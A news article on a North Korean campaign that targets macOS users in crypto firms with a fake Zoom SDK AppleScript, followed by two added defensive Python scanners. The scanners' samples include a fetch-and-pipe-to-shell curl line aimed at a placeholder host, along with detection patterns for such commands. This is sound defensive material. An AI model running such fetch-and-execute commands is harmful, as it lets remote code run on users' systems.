
North Korean social engineering campaign targets MacOS users

May 22, 2026  Twila Rosenbaum

A North Korean state-backed social engineering campaign targeting MacOS users has been uncovered by Microsoft's Threat Intelligence unit (MSTIC). The campaign, attributed to a threat actor tracked as Sapphire Sleet, employs a sophisticated multi-stage attack that tricks victims into manually executing malicious code by impersonating a software update for the Zoom videoconferencing platform. The operation has resulted in the theft of cryptocurrency assets, credentials, and sensitive personal data from individuals and organisations in the financial sector, particularly those involved in blockchain and digital assets.

According to MSTIC's report, the campaign demonstrates a shift in tactics for Sapphire Sleet, moving away from exploiting software vulnerabilities toward a user-initiated execution model. This approach allows the attackers to bypass several of MacOS's built-in security mechanisms, including Transparency, Consent and Control (TCC), Gatekeeper, quarantine enforcement, and notarisation checks. By having victims willingly run the malicious script, Sapphire Sleet achieves a highly reliable infection chain with lower operational friction, increasing the likelihood of successful compromise.

The attack chain in detail

The social engineering campaign begins with Sapphire Sleet operatives creating fake recruitment profiles on professional networking and social media platforms. These profiles are used to engage potential targets in conversations about job opportunities, particularly in the cryptocurrency and blockchain sectors. Selected victims are then invited to a technical interview, during which they are directed to download and execute a malicious file described as a software development kit (SDK) update for Zoom.

The file, named Zoom SDK Update.scpt, is a compiled AppleScript that, by default, opens in MacOS's Script Editor—a trusted Apple application capable of executing arbitrary shell commands. To further lull victims into a false sense of security, the script includes large blocks of decoy upgrade instructions that mimic a routine software update. Crucially, beneath this text, thousands of blank lines are inserted to push the malicious portion of the script beyond the immediately scrollable view. This crude but effective technique ensures that victims see only the benign upgrade instructions when they first open the file.

Once the victim scrolls down and executes the script, it first launches a trusted Apple-signed process to reinforce the appearance of a genuine update. The script then retrieves additional malicious content from attacker-controlled servers using the curl command and passes it back to be executed. This secondary content, also in AppleScript form, loads in Script Editor again to initiate delivery of the final payload—a full attack orchestrator capable of system reconnaissance, data exfiltration, and further operations.

The data stolen during these attacks includes Apple Notes content, cryptocurrency wallet data, browser-stored credentials, keychain information, and Telegram session data. MSTIC confirmed that Sapphire Sleet has successfully exfiltrated such information from multiple victims before the campaign was disrupted.

A persistent threat to financial services

Sapphire Sleet has been active since at least March 2020 and is believed to have links to the more notorious Lazarus Group, another North Korean state-sponsored hacking collective. The group's primary motivation is financial gain—specifically, looting victims' cryptocurrency wallets to generate revenue for the isolated and cash-strapped regime in Pyongyang. Additionally, they target intellectual property and technical secrets related to cryptocurrency trading platforms and blockchain technology.

The financial services sector remains a prime target for North Korean cyber operations. Venture capital firms, blockchain startups, and cryptocurrency exchanges are particularly attractive due to their high-value digital assets and often less mature security practices. Sapphire Sleet has demonstrated a persistent focus on this sector, refining its social engineering techniques over time to increase effectiveness.

Unlike some state-sponsored groups that rely on zero-day exploits or complex supply chain attacks, Sapphire Sleet's strategy relies heavily on human psychology. By masquerading as recruiters and job opportunities, they exploit trust and the desire for career advancement. This method is especially effective in the cryptocurrency industry, where remote work and technical interviews involving software installations are common.

MacOS security bypass

The campaign is notable for its ability to evade MacOS's layered security defenses. Apple's operating system includes several protective mechanisms: Gatekeeper ensures that only trusted software runs; notarisation checks verify that applications have been scanned by Apple for malicious content; quarantine enforcement tracks the origin of downloaded files; and TCC manages access to sensitive system resources.

However, because the victim voluntarily runs the AppleScript in Script Editor—a trusted application—these protections are circumvented. The script itself does not trigger Gatekeeper because it is interpreted by a trusted tool. Similarly, since the victim initiates the execution, quarantining and notarisation checks are bypassed. This highlights a fundamental limitation of security models that rely on detecting malicious code rather than preventing user-initiated actions.

MSTIC also noted that the attackers used sophisticated techniques to hide the malicious code within the script, including inserting thousands of blank lines to push it out of view. This simple obfuscation works because many users do not carefully review the entire content of a script before executing it, especially when presented with convincing decoy text.
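As an added illustration (not code from the article, Microsoft or Apple), the following Python scanner applies the two traits described above to the source text of an AppleScript: a very long run of blank lines that pushes the tail of the script out of the visible area, and a shell command that fetches remote content with curl and pipes it into an interpreter. It also serves the later recommendation to inspect compiled AppleScript files before they run. It assumes the compiled .scpt has already been decompiled to text (for example with macOS's osadecompile tool); the thresholds, regular expressions and the two sample scripts are constructed for the example.

```python
"""Heuristic scan of AppleScript source text for blank-line padding and for
shell commands that fetch remote content with curl and execute it.

Added example for illustration only; not Microsoft's or Apple's detection logic.
Assumes a compiled .scpt has already been decompiled to text before being
passed to scan_script(). Thresholds and patterns are constructed assumptions.
"""
import re

# Interpreters that fetched content is commonly piped into (constructed list).
PIPE_TO_INTERPRETER = re.compile(
    r"\bcurl\b[^|\n]*\|\s*(?:sh|bash|zsh|osascript|python3?)\b"
)
# AppleScript's way of running a shell command.
DO_SHELL = re.compile(r"do shell script", re.IGNORECASE)


def blank_run_stats(text):
    """Return (longest run of consecutive blank lines, fraction of blank lines)."""
    lines = text.splitlines()
    if not lines:
        return 0, 0.0
    longest = run = blank = 0
    for line in lines:
        if line.strip() == "":
            blank += 1
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    return longest, blank / len(lines)


def scan_script(text, max_blank_run=50, max_blank_fraction=0.5):
    """Return a list of findings (strings); an empty list means nothing flagged."""
    findings = []
    longest, fraction = blank_run_stats(text)
    if longest >= max_blank_run:
        findings.append(f"blank-line padding: {longest} consecutive blank lines")
    if fraction >= max_blank_fraction:
        findings.append(f"blank-line padding: {fraction:.0%} of lines are blank")
    for n, line in enumerate(text.splitlines(), 1):
        if DO_SHELL.search(line) and "curl" in line:
            findings.append(f"line {n}: shell command fetching remote content with curl")
        if PIPE_TO_INTERPRETER.search(line):
            findings.append(f"line {n}: curl output piped into an interpreter")
    return findings


# Constructed sample mimicking the layout the article describes: a few lines of
# decoy upgrade instructions, thousands of blank lines, then the part that
# fetches and runs remote content (placeholder URL, not a real host).
DECOY = "\n".join(
    f"-- Step {i}: follow the Zoom SDK upgrade instructions" for i in range(1, 6)
)
HIDDEN = 'do shell script "curl -fsSL https://placeholder.invalid/update | sh"'
SAMPLE_SUSPICIOUS = DECOY + "\n" * 3000 + HIDDEN + "\n"

# Constructed benign script: short, no padding, no network access.
SAMPLE_BENIGN = 'display dialog "Hello"\nset x to 1\n'

if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("suspicious", SAMPLE_SUSPICIOUS)):
        print(name, "->", scan_script(sample) or "no findings")
```

The blank-line check is deliberately a ratio as well as a run length: a script whose visible portion is a handful of lines followed by thousands of empty ones is unusual regardless of what the hidden tail contains, so the padding itself is a useful trigger for manual review.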

Mitigation and response

Apple has already implemented platform-level protections to detect and block Sapphire Sleet's infrastructure and malware. Safari browsing protections have been deployed, and new malware signatures have been issued to automatically update MacOS devices. However, as the attack vector relies on user behavior, technical controls alone are insufficient.

MSTIC recommends that organisations conduct user education about threats emanating from social media and external platforms, particularly any outreach that requires downloading software or executing terminal commands. Security teams should consider blocking or restricting the execution of compiled AppleScript files and unsigned Mach-O binaries downloaded from the internet. Any such files should be rigorously inspected and verified. It may also be wise to limit or audit the use of curl, especially when piped to interpreters.

Defenders should monitor for unauthorised modifications to the MacOS TCC database—a technique observed in this campaign—and audit LaunchDaemon and LaunchAgent installations. Users are advised to be cautious when copying and pasting sensitive data such as cryptocurrency wallet addresses or credentials, and to verify that pasted content matches the intended source. Rotating browser-stored credentials and protecting crypto wallets with hardware security measures are also recommended.
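One concrete form the LaunchDaemon and LaunchAgent audit recommended above can take, as an added example that is not part of the article or of any vendor's tooling: parse each launchd job definition with Python's standard plistlib and flag the traits a reviewer would want to look at first. The heuristics (interpreter handed an inline command string, curl piped into an interpreter, program living in a user-writable directory, automatic start) and both sample plists are constructed assumptions for this example.

```python
"""Audit a launchd job definition (LaunchAgent/LaunchDaemon plist) and report
traits worth manual review. Added example, not Apple's or Microsoft's tooling;
heuristics and sample plists are constructed for illustration."""
import plistlib
import re

# Shell and script interpreters; a job that hands one an inline command string
# deserves a closer look (constructed list).
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3"}
INLINE_FLAGS = {"-c", "-e"}
CURL_PIPE = re.compile(r"\bcurl\b.*\|\s*(?:sh|bash|zsh|osascript|python3?)\b")
# Locations writable by an ordinary user (constructed list).
USER_WRITABLE = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")


def audit_launchd_plist(data):
    """Return a list of findings for one plist (bytes); empty list means nothing flagged."""
    job = plistlib.loads(data)
    findings = []
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    args = [str(a) for a in args]
    if not args:
        findings.append("no Program or ProgramArguments key")
        return findings
    exe = args[0]
    base = exe.rsplit("/", 1)[-1]
    if exe.startswith(USER_WRITABLE):
        findings.append(f"program runs from a user-writable location: {exe}")
    if base in INTERPRETERS and any(a in INLINE_FLAGS for a in args[1:]):
        findings.append(f"{base} runs an inline command string")
    if CURL_PIPE.search(" ".join(args)):
        findings.append("curl output piped into an interpreter")
    if job.get("RunAtLoad") or job.get("KeepAlive"):
        findings.append("starts automatically (RunAtLoad/KeepAlive)")
    if not job.get("Label"):
        findings.append("missing Label")
    return findings


# Constructed sample: a job that shells out to fetch and run remote content
# (placeholder URL, not a real host) and starts at login.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>curl -fsSL https://placeholder.invalid/update | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# Constructed sample: a scheduled local binary with fixed arguments.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key>
  <array><string>/usr/local/bin/backup</string><string>--nightly</string></array>
  <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>
"""

if __name__ == "__main__":
    for name, data in (("benign", BENIGN_PLIST), ("suspicious", SUSPICIOUS_PLIST)):
        print(name, "->", audit_launchd_plist(data) or "no findings")
```

In practice the function would be run over every file in the system and per-user LaunchAgents and LaunchDaemons directories, with the output compared against a known-good baseline so that newly added jobs stand out rather than being judged in isolation.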

The broader risk extends beyond Sapphire Sleet. Social engineering campaigns targeting MacOS users are likely to increase as the platform's market share grows among high-value targets. The combination of convincing user prompts, trusted system tools, and manual execution creates a potent attack vector that is difficult to defend against purely with technical controls. Organisations must adopt a defense-in-depth approach that includes user awareness, strict software execution policies, and proactive monitoring for unusual system changes.


Source: ComputerWeekly.com News

